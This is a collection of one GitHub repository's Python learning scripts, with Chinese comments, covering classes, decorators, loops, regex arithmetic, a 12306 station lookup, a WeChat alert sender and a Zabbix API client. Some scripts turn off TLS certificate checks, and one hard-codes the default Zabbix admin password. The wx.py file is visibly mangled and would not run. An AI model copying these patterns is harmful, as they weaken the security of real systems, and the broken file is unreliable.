print(e)\n'''\n\n# assert 条件 断言 用户用户服从,不服从就报错,并且可捕获,一般不捕获\n# 条件必须满足,不满足就报错\nprint(123)\nassert 1 == 2\nprint(567)\n" }, { "alpha_fraction": 0.5009862184524536, "alphanum_fraction": 0.523668646812439, "avg_line_length": 15.095237731933594, "blob_id": "2b16469fa0140bfe1a69033636e65721a47c0a4b", "content_id": "ee976d9dbb3cb491c848cedebe98ad80ae7078ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 55, "num_lines": 63, "path": "/python学习/面向对象学习/class_属性.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-22\n\n__author__ = '@jiawenlong'\n\n\n# 属性的写法之一\n# class province:\n# def __init__(self):\n# self.L = ['jiawenlong']\n# # 属性\n# @property # 用于执行 obj.per\n# def per(self):\n# return self.L\n#\n# @per.setter\n# def per(self, val):\n# self.L.append(val)\n# print(self.L)\n#\n# @per.deleter\n# def per(self):\n# del self.L[1]\n# print(self.L)\n#\n# # 属性调用\n# obj = province('aaa')\n# # obj.per # print(\"Per\")\n# ret = obj.per\n# print(ret)\n# obj.per = 111\n#\n# del obj.per\n\n\n# 属性的写法之二\nclass province1:\n # 属性\n def __init__(self):\n self.L = ['jiawenlong']\n\n def per(self):\n return self.L\n\n def set_per(self, val):\n self.L.append(val)\n print(self.L)\n\n def del_per(self):\n del self.L[1]\n print(self.L)\n\n p1 = property(fget=per, fset=set_per, fdel=del_per)\n\n\nobj = province1()\n\nret = obj.p1\nprint(ret)\nobj.p1 = 111\ndel obj.p1\n" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.7702702879905701, "avg_line_length": 15.333333015441895, "blob_id": "50e9da0c16df6bc8b384f46117cadb1d5aa12fc2", "content_id": "0d2c5ca74ee493d5f01067cc05c9806b37aeac87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 148, "license_type": "no_license", "max_line_length": 24, "num_lines": 9, "path": "/python学习/模块/example.ini", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "[DEFAULT]\nserveraliveinterval = 45\ncompression = yes\ncompressionlevel = 9\nforwardx11 = yes\n\n[www.myconfigParser.com]\nport = 10086\nforwardx11 = yes\n\n" }, { "alpha_fraction": 0.5355424880981445, "alphanum_fraction": 0.5611972212791443, "avg_line_length": 27.78461456298828, "blob_id": "bb4c6ff556911740465deb126d8485810cce0643", "content_id": "81ad60f2ef6d708a5745135b7a749b532ad06273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2521, "license_type": "no_license", 
"max_line_length": 101, "num_lines": 65, "path": "/12306/fuck12306_get_city.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-24\n\n__author__ = '@jiawenlong'\n\nimport urllib2\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context # 忽略证书认证\n\n# 城市\ncity_uri = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9027'\n\n\ndef get_city_list(): # 本函数 是生成器\n cities = urllib2.urlopen(city_uri).read() # 访问城市的url获取城市的信息,是str\n cities = cities.split('=')[1] # 分割字符串得到想要的城市信息和对应的代码,生成list,list的第二个元素就是城市信息和对应的代码\n cities = cities.split('|') # 对第二个信息再次分割,生成list,就是城市相关信息\n\n for i in range(len(cities)/5): # 城市信息 5 个元素是一个城市,总共有 len(cities)/5 个城市\n city_name = cities[i * 5 + 1]\n city_code = cities[i * 5 + 2]\n yield city_name # 每组取出 i*5+1 和 i*5+2 这 2 个元素 就是城市对名称和对应对字母代码\n yield city_code\n\n\ndef get_city_code(city):\n cities_code = get_city_list() # 创建生成器 并肤质给 cities_code\n for i in cities_code: # 对生成器进行循环 取出第一次的值 城市名称 如: 北京\n code = next(cities_code)\n if i == city: # 和函数传入的城市对比 如果相同 输出城市名称和代码\n # print city, code\n return code\n\n# print get_city_code(\"天津\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n# def get_city_dic(): # 本函数 最终返回字典\n# cities = urllib2.urlopen(city_uri).read() # 访问城市的url获取城市的信息,是str\n# cities = cities.split('=')[1] # 分割字符串得到想要的城市信息和对应的代码,生成list,list的第二个元素就是城市信息和对应的代码\n# cities = cities.split('|') # 对第二个信息再次分割,生成list,就是城市相关信息\n#\n# for i in range(len(cities)/5): # 城市信息 5 个元素是一个城市,总共有 len(cities)/5 个城市\n# city_name = cities[i*5+1]\n# city_code = cities[i*5+2]\n# yield city_name, city_code # 每组取出 i*5+1 和 i*5+2 这 2 个元素 就是城市对名称和对应对字母代码\n" }, { "alpha_fraction": 0.46833929419517517, "alphanum_fraction": 0.49940264225006104, "avg_line_length": 15.411765098571777, "blob_id": "a1446aa44f24a9befc6acb7556335623fb2f3751", "content_id": "fa448a09f9874310ee5f55eda8ca3417ec50d564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "no_license", "max_line_length": 35, "num_lines": 51, "path": "/python学习/面向对象学习/单例模式.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\n\"\"\"\nclass Foo:\n \n \n def __init__(self, name, age):\n self.name = name\n self.age = age\n \n def show(self):\n print(self.name,self.age)\n\n# obj = Foo('ali', 19) # obj 也叫实例\n# obj1 = Foo('ali', 19) # obj 也叫实例\n# obj2 = Foo('ali', 19) # obj 也叫实例\n# obj3 = Foo('ali', 19) # obj 也叫实例\n\n# 单例,目的:永远使用同一份对象(实例)\nv = None\nwhile True:\n if v:\n v.show()\n else:\n v = Foo('Justin', 13)\n v.show()\n\"\"\"\n\n\nclass Foo:\n __v = None\n\n @classmethod\n def get_instance(cls):\n if cls.__v:\n return cls.__v\n else:\n cls.__v = Foo()\n return cls.__v\n\n\n# 不要使用 类()\nobj1 = Foo.get_instance()\nprint(obj1)\nobj2 = Foo.get_instance()\nprint(obj2)\n" }, { "alpha_fraction": 0.47592848539352417, "alphanum_fraction": 0.5116918683052063, "avg_line_length": 18.105262756347656, "blob_id": "2e3525d49b613263965504d5ebba2c9de31c9c23", "content_id": "8ab7a780ed9c124ca2f790dc90b368079532b966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 773, "license_type": "no_license", "max_line_length": 43, "num_lines": 38, "path": "/python学习/面向对象学习/class_属性练习.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", 
"text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-22\n\n__author__ = '@jiawenlong'\n\n\"\"\"class 属性练习,实现分页效果\"\"\"\n\nclass create_page:\n def __init__(self, page):\n try:\n p = int(page)\n if p >= 11 or p <= 0:\n p = 1\n except Exception as e:\n p = 1\n\n self.page = p\n\n @property\n def start(self):\n current_page = (self.page - 1) * 10\n return current_page\n\n @property\n def end(self):\n current_page = self.page * 10\n return current_page\n\nli = []\nfor i in range(1, 101):\n li.append(i)\n\nwhile True:\n p = input(\"请输入想要查看的页码(1-10)->: \")\n page = create_page(p)\n print(li[page.start:page.end])\n\n" }, { "alpha_fraction": 0.5954368114471436, "alphanum_fraction": 0.6427379250526428, "avg_line_length": 22.0256404876709, "blob_id": "f135ac03ef03681cb02a7de95bdbfe19f39ab28a", "content_id": "0b81de4b5478576e20a69c4381dd6e3d85a6d01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 69, "num_lines": 78, "path": "/未定义项目练习/helloword.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport time\nimport datetime\nimport random\nfrom dateutil import parser\n\nprint \"列表合并\"\nl1 = ['a', 'b']\nl2 = [1, 2]\nprint(\"L1:%s\" %l1 , \"L2:%s\" %l2)\nprint dict([l1, l2])\nprint dict(zip(l1, l2))\n\n\nprint('')\nprint(\"随机数:\")\ntime.sleep(1)\nprint(random.uniform(1, 10))\nprint(random.randint(1, 10))\nprint(random.random())\n\nprint('')\nprint(\"时间模块\")\nprint('时间模块 天/月/年:%s' % (datetime.date.today()).strftime('%d/%m/%Y'))\nprint('时间模块 年-月-日:%s' % (datetime.date.today()).strftime('%Y-%m-%d'))\nmyDT = datetime.date(2017, 8, 2)\nprint(myDT.strftime('%Y-%m-%d'))\nprint time.ctime(time.time())\nprint time.asctime(time.localtime(time.time()))\ndt1 = time.asctime(time.gmtime(time.time()))\ndt = parser.parse(dt1)\nprint dt\n\nprint('')\nprint('字符串长度')\ns = 'strlen'\nprint \"strlen:\", len(s)\nprint(\"strlen:\", len(s))\n#st = raw_input('pleaer input a string:')\nst=\"1234\"\nprint \"st:\", len(st)\nprint \"the string st has %d characters\" % len(st)\n\n\n\n\ntimbitsLeft = int(input(\"输入购买个数:\")) # 步骤1: 得到输入\ntotalCost = 0 # 步骤2: 设定总计\n\n# 步骤3: 尽可能地多买大盒子\nif timbitsLeft >= 40:\n bigBoxes = int(timbitsLeft / 40)\n totalCost = totalCost + bigBoxes * 6.19 # 更新总计\n timbitsLeft = timbitsLeft - 40 * bigBoxes # 仍需计算timbits\nif timbitsLeft >= 20:\n bigBoxes = int(timbitsLeft / 20) # 步骤4, 我们能购买一个中盒子么?\n totalCost = totalCost + 3.39\n timbitsLeft = timbitsLeft - 20\nif timbitsLeft >= 10:\n bigBoxes = int(timbitsLeft / 10)# 步骤5, 我们能购买一个小盒子么?\n totalCost = totalCost + 1.99\n timbitsLeft = timbitsLeft - 10\nif timbitsLeft >= 1:\n totalCost = totalCost + 0.20\n timbitsLeft = timbitsLeft - 1\n\ntotalCost = totalCost + timbitsLeft * 0.2 # 步骤6\nprint(\"总计需要:%s\" % totalCost)\n\n\ndef middle(L):\n Longth=len(L)\n mid=int(Longth//2)\n print(L[mid])\n\nmiddle([1,2,3,4,51,4,10,30])\n\n" }, { "alpha_fraction": 0.45393258333206177, "alphanum_fraction": 0.4988763928413391, "avg_line_length": 15.481481552124023, "blob_id": "4e8bfc758bf16fccb5404dc5715ddd7d676a3d9b", "content_id": "de9ad0c8c4bc04368898e389167d0e0a527eb894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 107, "num_lines": 54, "path": "/python学习/从新手到大师/循环结构.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/15 21:57\n\n\n# \"\"\"\n# 判断是否是素数\n# \"\"\"\n#\n# from math import sqrt\n#\n# num = int(input('请输入一个正整数:'))\n# end = int(sqrt(num))\n# is_prime = True\n# for x in range(2, end + 1):\n# if num % x == 0:\n# is_prime = False\n# break\n#\n# if is_prime and num != 1:\n# print('%d 是素数' % num)\n# else:\n# print('%d 不是素数' % num)\n\n# print(int(sqrt(num)))\n\n\n\"\"\"\n 练习1\n 百钱百鸡\n 公鸡5元,母鸡3元,小鸡三只1元,一百元一百只鸡\n 公鸡、母鸡、小鸡各多少\n\"\"\"\n\nfor x in range(0, 20):\n for y in range(0, 33):\n z = 100 - x - y\n if 5 * x + 3 * y + z / 3 == 100:\n print('公鸡 %d 只 , 母鸡 %d 只, 小鸡 %d 只' % (x, y, z))\n\n\n# a = 10\n#\n#\n# def one():\n# # global a\n# print(a) # UnboundLocalError: local variable 'a' referenced before assignment 未分配的本地错误:局部变量a在赋值前引用了\n# a = 100\n# print(a)\n#\n#\n# one()\n# print(a)\n" }, { "alpha_fraction": 0.4962002635002136, "alphanum_fraction": 0.4975413382053375, "avg_line_length": 23.85555648803711, "blob_id": "38a347388327c90b607c576f46d9a49aa661b77b", "content_id": "f4262c41793f69761fff9f2db595cfe4e240b852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2473, "license_type": "no_license", "max_line_length": 75, "num_lines": 90, "path": "/python学习/函数/zhuangshiqi_zuoye.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\n\nlogin_status = \"False\"\nusername = \"jiawenlong\"\npassword = \"123456\"\n\nwxusername = \"wx\"\nwxpassword = \"123456\"\n\nimport time\n\n\ndef input_name(auth, name, pwd, page, *x, **y):\n user = input(\"请输入 %s 用户名: \" % auth)\n passwd = input(\"请输入 %s 密码: \" % auth)\n if user == name and passwd == pwd:\n page(*x, **y)\n else:\n print(\"\\n账号密码输入错误,请重新输入\")\n input_name(auth, name, pwd, page, *x, **y)\n\n\ndef max_login(auth=\"jd\"): ## 装饰器参数\n def check_login(page): ### 装饰器函数\n def login(*x, **y):\n global login_status\n if login_status != \"True\":\n if auth == \"jd\":\n input_name(auth, username, password, page, *x, **y)\n login_status = \"True\"\n elif auth == \"wx\":\n input_name(auth, wxusername, wxpassword, page, *x, **y)\n login_status = \"True\"\n else:\n page(*x, **y)\n\n return login\n\n return check_login\n\n\n@max_login(\"wx\")\ndef home(*x, **y):\n print(\"\\nThis is home page....\")\n page_name = \" \"\n for i in x:\n page_name = i + \" \" + page_name\n print(\"I Have All The Class :\")\n print(\"They ware %s ......\\n\" % page_name)\n\n\n@max_login(\"jd\")\ndef jr(*x, **y):\n print(\"\\nThis is jr page\")\n page_name = \" \"\n for i in x:\n page_name = i + \" \" + page_name\n print(\"I Have All The JinRong Class: \")\n print(\"They ware %s .....\\n\" % page_name)\n\n\n@max_login()\ndef phone(*x, **y):\n page_name = \" \"\n print(\"\\nThis is Phone Page......\")\n for i in x:\n page_name = i + \" \" + page_name\n print(\"You Can search All Class of Phone: \")\n print(\"They ware %s ......\\n\" % page_name)\n\n\nprint(\"\\nThis home Page \\n\")\nhtm = \"home\"\nwhile True:\n print(\"\\n当前您在 home 页面,还可以进入的页面是:jr home phone OR exit 退出\")\n htm = input(\"---> \")\n if htm == \"jr\":\n jr(\"基金理财\", \"京东理财\", \"京东E卡\")\n elif htm == \"home\":\n home(\"京东金融\", \"手机\", \"服装\", \"超市\")\n elif htm == \"phone\":\n phone(\"华为\", \"三星\", \"小米\", \"荣耀\", \"iphone\")\n elif htm == \"exit\":\n exit()\n else:\n print(\"\\n您想进入的页面正在建设中,请重新选择!!!,5秒后自动跳转 home 页面!!!!!\")\n time.sleep(5)\n" }, { "alpha_fraction": 0.6436475515365601, 
"alphanum_fraction": 0.6534836292266846, "avg_line_length": 30.49032211303711, "blob_id": "897c2cbe87216aca8efae23fa952575a96aeebf9", "content_id": "1c0d71774ae56602c653f552b324b444065b421e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5668, "license_type": "no_license", "max_line_length": 122, "num_lines": 155, "path": "/未定义项目练习/wx.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n# author: yangrong\n# date: 2015-8-19\n# 本微信报警脚本应用于企业订阅号\n# 当用户主动发消息给公众号的时候(包括发送信息、点击自定义菜单、订阅事件、扫描二维\n# 码事件、支付成功事件、用户维权),微信将会把消息数据推送给开发者,开发者在一段时\n# 间内(目前修改为48小时)可以调用客服消息接口,通过POST一个JSON数据包来发送\n# 消息给普通用户,在48小时内不限制发送次数。\n\n\n\nimport os\nimport urllib2\nimport requests\nimport sys\nimport time\nimport json\nimport pickle\n\nappid = 'wxc88**************'\nsecret = 'b9b8925aaa0eafc***********'\ntoken_file = '/tmp/token_file.txt'\nlog_file = '/tmp/wechat.log'\nopenid_user_file = '/tmp/openid_user.txt'\nopenid_list = [\"omPAFj8PBaE4UbdOGmgjFfq-shFM\", # 杨容\n \"omPAFj27U-7PJkgYyHMk1wvDI27o\", # 阿飞\n ] # 这是微信接收者的openid\n\n# 报警格式,脚本名 收件人 标题 内容\n# 这是zabbix发送内容格式,所以\n# 这里取出标题和内容就行了\n\n# 帮助信息,要求必须传参4个\nif len(sys.argv) != 4:\n print 'Usage: %s mail-to title content' % sys.argv[0]\n print 'Example: '\n print ' %[email protected] \"this is testtitle\" \"this is test content.\"' % sys.argv[0]\n sys.exit()\n\ntitle = sys.argv[2]\ncontent = sys.argv[3]\ncurrent_hour = time.strftime('%H', time.localtime(time.time()))\n\n\n# 日志记录函数,把标题,用户id,状态记录\ndef log(title, openid, status):\n withopen(log_file, 'ab') as f:\n current_time = time.strftime('%Y-%m-%d%H:%M:%S', time.localtime(time.time()))\n f.write('%s| %s | %s | %s\\n' % (current_time, openid, status, title))\n\n\n# 获取token\nclass Token(object):\n def __init__(self, appid, secret):\n self.baseurl = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}'.format(\n appid, secret)\n self.expire_time = sys.maxint\n\n def get_token(self):\n if self.expire_time > time.time():\n request = urllib2.Request(self.baseurl)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n ret = json.loads(ret)\n if 'errcode' in ret.keys():\n print >> ret['errmsg'], sys.stderr\n sys.exit(1)\n self.expire_time = time.time() + ret['expires_in']\n self.access_token = ret['access_token']\n token_pre = [current_hour, self.access_token]\n with open(token_file, 'wb') as f:\n pickle.dump(token_pre, f)\n\n return self.access_token\n\n\n# access_token = Token(appid=appid,secret=secret).get_token() #这是获取access_token的代码\n# print access_token\n\n\n# 获取所有的openid,然后根据openid获取用户信息,提取出用户名,最后输出用户名与openid的对应关系。\nclass get_user():\n def__init__(self):\n self.access_token = Token(appid, secret).get_token()\n\n\ndefget_openid_list(self):\nopenid_list_url = 'https://api.weixin.qq.com/cgi-bin/user/get?access_token={0}&next_openid='.format(self.access_token)\nrequest = urllib2.Request(openid_list_url)\nresponse = urllib2.urlopen(request)\nret = response.read().strip()\nopenid_list = json.loads(ret)\n# printopenid_list['data']['openid']\nopenid_list = openid_list['data']['openid']\nforopenid in openid_list:\nuser_info_url = 'https://api.weixin.qq.com/cgi-bin/user/info?access_token={0}&openid={1}'.format(self.access_token,\n openid)\nuser_info_request = urllib2.Request(user_info_url)\nuser_info_response = urllib2.urlopen(user_info_request).read().strip()\nuser_info = json.loads(user_info_response)\nif 'errcode' in user_info.keys():\n print>> 
user_info['errmsg'], sys.stderr\n sys.exit()\nwithopen(openid_user_file, 'wb') as f:\nf.write('openid:%s nickname:%s' % (openid, user_info['nickname']))\n\n\n# 使用post方式发送报警\ndef send_msg(title, content):\n # 一天能够获取的access_token次数是2000次,每次取到的token有效时间2小时,所以pickle dump时,把当前小时数与access_token写入文件,每一小时获取一次token.\n current_hour = time.strftime('%H', time.localtime(time.time()))\n ifnot\n os.path.exists(token_file):\n access_token = Token(appid, secret).get_token()\n\n\nwithopen(token_file, 'rb') as f:\ntoken_pre = pickle.load(f)\n# print'token_pre:',token_pre\naccess_token_pre = token_pre[1]\ncurrent_hour_pre = token_pre[0]\nifcurrent_hour == current_hour_pre:\naccess_token = access_token_pre\nelse:\naccess_token = Token(appid, secret).get_token()\n# print'access_token:',access_token\n# 循环openid_list,给每个成员单独推送微信消息\nforopenid in openid_list:\n# print'openid:',openid\nurl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=%s' % access_token\npayload = {\n \"touser\": '%s' % openid,\n \"msgtype\": \"text\",\n \"text\": {\n \"content\": \"Title: %s\\nContent:%s\" % (title, content)\n }\n}\nret = requests.post(url, data=json.dumps(payload, ensure_ascii=False), verify=False)\nresult = ret.json()\n\n# printresult\n# 如果这一次发送失败,则代表可能access_token有问题,删除pickle dump文件,重新生成一次access_token\nif result['errcode']:\n log(title, openid, 'sendfail')\n os.remove(token_file)\n access_token = Token(appid, secret).get_token()\nelse:\n log(title, openid, 'sendsuccess')\n\n # printpost(url, data)\n\n# get_user().get_openid_list() #这是遍历所有openid,获取openid和用户名的对应关系。\n\nsend_msg(title, content) # 发送微信信息" }, { "alpha_fraction": 0.4917701780796051, "alphanum_fraction": 0.5178571343421936, "avg_line_length": 23.36742401123047, "blob_id": "51ebc7056cb1b4ad4f35d9f81c132d228a2e554a", "content_id": "67e897830934707bd3dad99e6c3a0c8d04996321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6946, "license_type": "no_license", "max_line_length": 209, "num_lines": 264, "path": "/未定义项目练习/lianxie.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n\n\n### 查找给出的目录中 所有 txt 结尾的文件\n#path = raw_input(\"请输入目录路径——>: \")\n#print(os.getcwd()) ### 当前目录\n#os.chdir(path) ### 转换目录\n#print(os.getcwd())\n\n\n# find 1\n#path = \"/Users/admin/Downloads\"\n#keys = \"txt\"\n#files = os.walk(path) # 遍历所有目录 files 是个地址\n#for file in files: # file 是 给出路径下的所有目录以及目录下的文件,是一个元组 file 是 eg: ('/Users/admin/Downloads/apk/\\xe5\\x95\\x86\\xe6\\x88\\xb7app', [], ['bqboss_2.8.6.apk', 'bqboss_2.8.7.apk', 'bqboss_2.8.8.apk', 'bqboss_2.8.9.apk'])\n# for i in file: # i 是一个列表 根据file来遍历\n# for k in i: # k 是文件名,或者目录名 根据 file i 来遍历\n# if k.endswith(keys): # k 是文件名\n# print file[0] + \"/\" + k # 输出给出的路径和文具吗\n\n#one\n#path = \"/Users/admin/Downloads\"\n#keys = \"txt\"\n#for parent, dirname, filenames in os.walk(path):\n# for filename in filenames:\n# if filename.endswith(keys):\n# print parent + \"/\" + filename\n\n# find 2\n#def findfile(inputdir):\n# txtlist = []\n# for parent, dirnames, filename in os.walk(inputdir):\n# #print parent,dirnames\n# for filenames in filename:\n# txtlist.append(filenames)\n# return fnmatch.filter(txtlist, '*.txt') ## fnmatch.filter()第一个参数必须是列表\n# findfile(path)\n# #print(findfile(path))\n\n## 竖排文字 行转列\n# x = u\"静夜思 李白床前明月光,疑似地上霜。举头望明月,低头思故乡.\"\n# k = 0\n# for i in range(0,6): #行\n# s = \"\"\n# for m in range(0,5): # 列\n# s += x[ i + 6 * m ] + \"|\"\n# k += 1\n# if k%5 == 0: print s ;continue\n\n# import 
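os\n\n# (added sketch, not from the original file) the commented attempts above can be\n# collapsed with fnmatch; path and keys are the hypothetical inputs they used:\n#     import os, fnmatch\n#     for parent, dirnames, filenames in os.walk(path):\n#         for hit in fnmatch.filter(filenames, '*.' + keys):\n#             print os.path.join(parent, hit)\n\n# import 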
os\n# import fnmatch\n# ### python 实现grep -lr\n# search=\"微信\"\n# path = \"/Users/admin/Downloads/crt\"\n# keys = \"txt\"\n# for parent, dirname, filenames in os.walk(path):\n# for filename in filenames:\n# file = parent + \"/\" + filename\n# f = open(file,'r')\n# print file\n# while True:\n# line = f.readline()\n# if search in line:\n# print file\n# f.closed\n# break\n # print parent + \"/\" + filename\n\n\n\n# import pandas as pd\n# import codecs\n\n# xd = pd.ExcelFile('/Users/admin/Documents/work/日报-周报/运维日报(2017-09-15-贾文龙).xlsx')\n# df = xd.parse(xd.sheet_names, header=None, keep_default_na=True)\n# df = pd.read_excel('/Users/admin/Documents/work/日报-周报/运维日报(2017-09-15-贾文龙).xlsx', sheetname=0)\n# print df.dtypes\n\n# with codecs.open(\"/Users/admin/Documents/work/日报-周报/0915.html\", \"w\", \"utf-8\") as rb:\n# rb.write(df.to_html(header=False, index=False,))\n\n#\n# import xlrd\n# import datetime as dt\n# import os\n#\n# DT=dt.date.today().strftime('%Y-%m-%d')\n# file_name=\"/Users/admin/Documents/work/日报-周报/运维日报(\" + DT + \"-贾文龙).xlsx\"\n# md_file=\"/Users/admin/Documents/work/shells/rb.md\"\n#\n# rb=open(md_file,'w')\n# book = xlrd.open_workbook(file_name)\n# print \"The number of worksheets is\", book.nsheets\n# # print \"Worksheet name(s):\", book.sheet_names()[0]\n# sh = book.sheet_by_index(0)\n# # print sh.name, sh.nrows, sh.ncols\n#\n# for hang in range(0, sh.nrows):\n# if hang == 0 or hang == 1:\n# continue\n# for lie in range(0, sh.ncols):\n# if sh.cell_value(rowx=hang, colx=lie):\n# value = sh.cell_value(hang, lie)\n# if lie == 5:\n# print \"|\"\n# rb.write(\"|\" + '\\n')\n# if hang == 2 and lie == 5:\n# print \"|--|--|--|--|--|\"\n# rb.write(\"|--|--|--|--|--|\" + '\\n')\n# else :\n# print \"|\",\n# rb.write(\"|\")\n# # print(\"\\t%-30s\") % value.encode(\"utf-8\"),\n# print(\"%s\") % value.encode(\"utf-8\"),\n# rb.write(value.encode(\"utf-8\"))\n# rb.closed\n\n\n # print h, l\n# for rx in range(sh.nrows):\n# # print sh.row(rx)\n# h = sh.row(rx)\n# for i in h:\n# print i.dump(, header=False)\n\n\n# st = book.sheet_by_index(0)\n# print book.sheet_by_name(u'技术日报')\n# print book.sheet_names()\n# print book.sheet_names()[0]\n# print st.name, st.nrows, st.ncols\n\n\n# ##### 温度转换\n# def F2C(f):\n# C = (f - 32) * (5.0/9)\n# return str(C) + \"C\"\n# def C2F(c):\n# F = c * (9.0/5) + 32\n# return str(F) + \"F\"\n#\n# W = raw_input(\"请输入温度:\")\n# if W.endswith(\"C\"):\n# W = float(W.replace(\"C\", \"\"))\n# print(float(W),type(W))\n# print(C2F(W))\n# elif W.endswith(\"F\"):\n# W = float(W.replace(\"F\", \"\"))\n# print(float(W),type(W))\n# print(F2C(W))\n\n# #### 信用检查\n# def add(S):\n# sumh = 0\n# S = S.replace(\" \", \"\")\n# for i in S:\n# sumh += int(i)\n# return sumh\n#\n# def if_ok(str_list):\n# for string in str_list:\n# if len(string) == 4 and len(str_list) == 4 and string.isdigit():\n# if_or_not = True\n# else:\n# if_or_not = False\n# return if_or_not\n#\n# def check(S):\n# if S.startswith(\" \") or S.endswith(\" \") or S == \"\":\n# # return False\n# print(\"卡号输入错误!请重试!\")\n# L = S.lstrip().split()\n# if if_ok(L) :\n# resault = add(S)\n# if resault%10 == 0:\n# print(\"您的卡号为: %s\" % S)\n# # return True\n# else:\n# # return False\n# print(\"卡号输入错误!请检查!\")\n# else:\n# # return False\n# print(\"卡号输入错误!请检查!\")\n#\n# # print(check('9384 3495 3297 0121'))\n# check('9384 3495 3297 0121')\n# check('0000000000000000')\n\n\n# ####\n# l = [1,2,3,4,4,3,0,4]\n#\n# def max_num(n):\n# a = n\n# b = 0\n# if a > b:\n# max = a\n# return max\n#\n# max_num(1)\n# for i in l:\n# print l.count(i)\n# # 
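(see the added note below)\n# (added sketch, not in the original) collections.Counter gets the same answer in one step:\n#     from collections import Counter\n#     print Counter(l).most_common(1)    # [(4, 3)] for l = [1, 2, 3, 4, 4, 3, 0, 4]\n# # 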
print max(l.count(i))\n\n\n\n#\n# def outer():\n#     x=100\n#     def inner():\n#         x+=100\n#         print(x)\n#     return inner\n#\n#\n# myx=outer()\n# myx()\n\n\nimport requests\nimport json\n\nZABIX_ROOT = 'http://zabbix.bqmart.cn'\nurl = ZABIX_ROOT + '/api_jsonrpc.php'\n\n# user.login\npayload = {\n    \"jsonrpc\": \"2.0\",\n    \"method\": \"user.login\",\n    \"params\": {\n        'user': 'admin',\n        'password': 'zabbix',\n    },\n    \"auth\": None,\n    \"id\": 0,\n}\nheaders = {\n    'content-type': 'application/json',\n}\nreq = requests.post(url, json=payload, headers=headers)\nauth = req.json()\nprint('req:', req)\nprint('auth:', auth)\n\n# host.get\npayload = {\n    \"jsonrpc\": \"2.0\",\n    \"method\": \"host.get\",\n    \"params\": {\n        'output': [\n            'hostid',\n            'name'],\n    },\n    \"auth\": auth['result'],\n    \"id\": 2,\n}\nres2 = requests.post(url, data=json.dumps(payload), headers=headers)\nres2 = res2.json()\nprint('res2:', res2)\n\nfor host in res2['result']:\n    print(host['name'])\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4308888018131256, "alphanum_fraction": 0.45623520016670227, "avg_line_length": 21.930233001708984, "blob_id": "9b96f07bca3cc45bd9224a8ee348cd262a6c597f", "content_id": "ab53c5f7e098dc8a6c84ea55b726c95115dfc8f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2969, "license_type": "no_license", "max_line_length": 92, "num_lines": 129, "path": "未定义项目练习/re_test.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport re\nimport os\nimport string\n\n\n# pattern = re.compile(r'hello')\n#\n# match1 = pattern.match('hello world!')\n# match2 = pattern.match('hellox world')\n# match3 = pattern.match('helllo world')\n#\n# if match1:\n#     print match1.group()\n# else:\n#     print 'Faile'\n#\n# if match2:\n#     print match2.group()\n# else:\n#     print 'Faile'\n#\n# if match3:\n#     print match3.group()\n# else:\n#     print 'Faile'\n#\n#\n# ret = re.findall('f(as)', 'xdfreadfasas')\n# print(ret)\n# print(os.getcwd())\n\n# striaaa = '((3+5*2/4)*3)*((2+7/3*5)-(4/2))'\n# rent = re.findall('\\([^()]+\\)', striaaa)\n# print 'source:', rent, striaaa\n\n# ret = re.search('\\([^()]+\\)', striaaa)\n# st = ret.group()\n# print 'source:', st, striaaa\n\ndef addminus(s):\n    ret = re.search('\\d+\\.?\\d*[+-]\\d+\\.?\\d*', s)\n    if ret:\n        ret = ret.group()\n        x, y = re.split('[+-]', ret)\n        x = float(x)\n        y = float(y)\n        ysf = re.search('[+-]', ret).group()\n        if ysf == '+':\n            